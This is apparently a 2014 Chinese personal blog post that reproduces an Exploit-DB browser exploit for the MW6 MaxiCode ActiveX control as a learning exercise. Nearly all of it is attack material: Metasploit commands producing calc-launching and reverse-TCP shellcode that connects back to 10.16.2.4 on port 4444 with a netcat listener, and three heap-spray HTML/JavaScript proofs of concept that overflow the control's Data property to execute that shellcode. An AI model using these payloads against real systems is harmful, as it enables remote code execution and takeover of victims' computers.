zcc1414

博客园 首页 联系 订阅 管理

软件下载地址: http://www.exploit-db.com/wp-content/themes/exploit/applications/b02221a6c4b96f8319127e34f3c4f0ee-MW6MaxiCode.ZIP

学习于  http://www.exploit-db.com/exploits/31178/

1)MSF  生成shellcode    calc

msf > msfpayload windows/exec CMD=calc J
[*] exec: msfpayload windows/exec CMD=calc J

// windows/exec - 196 bytes
// http://www.metasploit.com
// VERBOSE=false, PrependMigrate=false, EXITFUNC=process, 
// CMD=calc
%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063


利用上面生成的shellcode制作 POC
<object classid='clsid:2355C601-37D1-42B4-BEB1-03C773298DC8' id='target' /></object>  
<script>  
var nop = unescape("%u9090");  
var shellcode=unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063");  

while (nop.length < 0x100000/2)   
{nop += nop;}  
  
nop=nop.substring(0,0x100000-32/2-4/2-2/2-1-shellcode.length);  
nop =nop+ shellcode;  
  var memory = new Array();  
  for (var i=0;i<200;i++)   
{memory[i] += nop;}  

arg1='\x0a';
while(arg1.length < 2000){arg1 += '\x0c';}
arg2 = '\x0c\x0c\x0c\x0c';
arg1 = arg1 + arg2;
target.Data = arg1;
</script>  

2)利用MSF  生成  反弹shell   主机nc -lvp 4444 监听

 payload(shell_reverse_tcp) > generate -t js_le
// windows/shell_reverse_tcp - 314 bytes
// http://www.metasploit.com
// VERBOSE=false, LHOST=10.16.2.4, LPORT=4444, 
// ReverseConnectRetries=5, ReverseAllowProxy=false, 
// PrependMigrate=false, EXITFUNC=process, 
// InitialAutoRunScript=, AutoRunScript=
%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u68c7%u100a%u0402%u0268%u1100%u895c%u6ae6%u5610%u6857%ua599%u6174%ud5ff%u6368%u646d%u8900%u57e3%u5757%uf631%u126a%u5659%ufde2%uc766%u2444%u013c%u8d01%u2444%uc610%u4400%u5054%u5656%u4656%u4e56%u5656%u5653%u7968%u3fcc%uff86%u89d5%u4ee0%u4656%u30ff%u0868%u1d87%uff60%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff

POC

<object classid='clsid:2355C601-37D1-42B4-BEB1-03C773298DC8' id='target' /></object>  
<script>  
var nop = unescape("%u9090");  
var shellcode=unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u68c7%u100a%u0402%u0268%u1100%u895c%u6ae6%u5610%u6857%ua599%u6174%ud5ff%u6368%u646d%u8900%u57e3%u5757%uf631%u126a%u5659%ufde2%uc766%u2444%u013c%u8d01%u2444%uc610%u4400%u5054%u5656%u4656%u4e56%u5656%u5653%u7968%u3fcc%uff86%u89d5%u4ee0%u4656%u30ff%u0868%u1d87%uff60%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff")
	while (nop.length < 0x100000/2)   
{nop += nop;}  
  
nop=nop.substring(0,0x100000-32/2-4/2-2/2-1-shellcode.length);  
nop =nop+ shellcode;  
  var memory = new Array();  
  for (var i=0;i<200;i++)   
{memory[i] += nop;}  

arg1='\x0a';
while(arg1.length < 2000){arg1 += '\x0c';}
arg2 = '\x0c\x0c\x0c\x0c';
arg1 = arg1 + arg2;
target.Data = arg1;
</script>  



3)利用自己的calc  shellcode生成POC

<object classid='clsid:2355C601-37D1-42B4-BEB1-03C773298DC8' id='target' /></object>  
<script>  
var nop = unescape("%u9090");  
var shellcode=  
"\u68fc\ubcc9\u6ba6\u6368\ud189\u8b4f\u8df4\uf47e"+
"\udb33\u04b7\ue32b\ud233\u8b64\u305a\u4b8b\u8b0c"+
"\u1c49\u098b\u518b\u8b18\u3452\ufa80\u7433\u8b02"+
"\u8b09\u0869\u60ad\u458b\u8b3c\u054c\u0378\u8bcd"+
"\u2059\udd03\uff33\u8b47\ubb34\uf503\u0f99\u06be"+
"\uc43a\u0874\ucac1\u0307\u46d0\uf1eb\u543b\u1c24"+
"\ue475\u598b\u0324\u66dd\u3c8b\u8b7b\u1c59\udd03"+
"\u2c03\u95bb\uab5f\u6157\uc93d\ua6bc\u756b\u33b5"+
"\u33db\u53c0\u3c40\u7520\u33fa\u53db\u63bb\u6c61"+
"\u5363\ucc8b\uc033\u5454\u5050\u5450\u5050\u5051"+
"\u57ff\u33fc\u53db\u57ff\ucdf8\u9090";  

while (nop.length < 0x100000/2)   
{nop += nop;}  
  
nop=nop.substring(0,0x100000-32/2-4/2-2/2-shellcode.length);  
nop =nop+ shellcode;  
  var memory = new Array();  
  for (var i=0;i<200;i++)   
{memory[i] += nop;}  

arg1='\x0a';
while(arg1.length < 2000){arg1 += '\x0c';}
arg2 = '\x0c\x0c\x0c\x0c';
arg1 = arg1 + arg2;
target.Data = arg1;
</script>  



posted on 2014-05-24 16:50  zcc1414  阅读(699)  评论(0编辑  收藏  举报